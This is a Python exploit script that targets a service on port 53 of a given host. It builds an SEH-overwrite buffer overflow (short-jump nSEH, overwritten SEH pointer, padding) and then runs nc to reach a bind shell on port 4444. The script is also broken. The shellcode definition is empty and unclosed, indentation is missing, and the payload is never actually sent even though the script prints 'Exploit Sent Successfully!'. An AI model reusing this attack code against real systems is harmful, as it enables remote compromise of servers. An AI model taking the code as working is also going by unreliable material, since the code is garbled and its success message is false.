import socket, sys, os, time
usage = "\n Usage: " + sys.argv[ 0 ] + " <host> \n"
if len (sys.argv) < 2 :
print usage
sys.exit( 0 )
host = sys.argv[ 1 ]
shellcode = (
nSEH = '\xeb\x06\x90\x90'
SEH = '\xd1\x07\xfc\x7f'
opcode = "\xe9\xdf\xf6\xff\xff"
junk = 'A' * ( 2324 - len (shellcode))
padding = 'A' * 600
buff = shellcode + junk + nSEH + SEH + opcode + padding
print "[+] Connecting to %s:53" % (host)
try :
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 53 ))
aix = shellcode + 'A' * ( 2324 - len (shellcode))
print "[*] Sending payload.." + " shellcode: " + str ( len (shellcode))
print "[*] Exploit Sent Successfully!"
print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444\r"
time.sleep( 5 )
os.system ( "nc -n " + host + " 4444" )
except :
print "[!] Could not connect to " + host + ":53\r"
sys.exit( 0 )